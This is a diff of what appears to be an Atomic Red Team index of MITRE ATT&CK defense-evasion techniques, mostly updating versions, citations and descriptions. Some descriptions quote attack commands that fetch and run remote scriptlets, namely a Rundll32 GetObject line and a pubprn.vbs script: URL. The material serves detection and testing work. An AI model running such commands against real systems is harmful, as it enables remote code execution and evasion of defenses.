+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -234,6 +238,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -241,10 +246,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -254,6 +261,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -262,15 +277,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -281,10 +303,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -320,7 +342,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -350,7 +372,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -361,9 +383,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests:
     - name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -840,49 +861,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -897,20 +879,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests:
     - name: Malicious PAM rule
@@ -1061,7 +1080,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -1088,8 +1107,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -1131,7 +1148,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -1209,7 +1225,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests:
     - name: chmod - Change file or folder mode (numeric mode)
@@ -1598,7 +1613,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1617,7 +1632,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests:
     - name: PubPrn.vbs Signed Script Bypass
@@ -1726,7 +1740,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -1784,7 +1797,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests:
     - name: Read volume boot sector via DOS device path (PowerShell)
@@ -1815,9 +1827,85 @@ defense-evasion:
           Format-Hex -InputObject $buffer
         name: powershell
         elevation_required: true
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -1843,11 +1931,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -1892,7 +1979,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests:
     - name: New-Inbox Rule to Hide E-mail in M365
@@ -1948,7 +2034,7 @@ defense-evasion:
         elevation_required: false
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -2019,11 +2105,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -2091,7 +2176,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests:
     - name: Loadable Kernel Module based Rootkit
@@ -2303,7 +2387,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -2340,8 +2424,6 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests:
     - name: File Extension Masquerading
@@ -2419,7 +2501,7 @@ defense-evasion:
         name: command_prompt
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -2520,7 +2602,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
@@ -3221,7 +3302,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -3255,8 +3336,6 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests:
     - name: Sudo usage
@@ -3374,7 +3453,7 @@ defense-evasion:
           sudo visudo -c -f /usr/local/etc/sudoers
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -3426,12 +3505,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -3511,7 +3589,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests:
     - name: UEFI Persistence via Wpbbin.exe File Creation
@@ -3532,7 +3609,7 @@ defense-evasion:
         elevation_required: true
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -3551,7 +3628,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -3565,7 +3641,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -3592,8 +3667,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -3624,7 +3699,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests:
     - name: Service Registry Permissions Weakness
@@ -3740,7 +3816,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -3793,7 +3868,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -3809,11 +3884,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
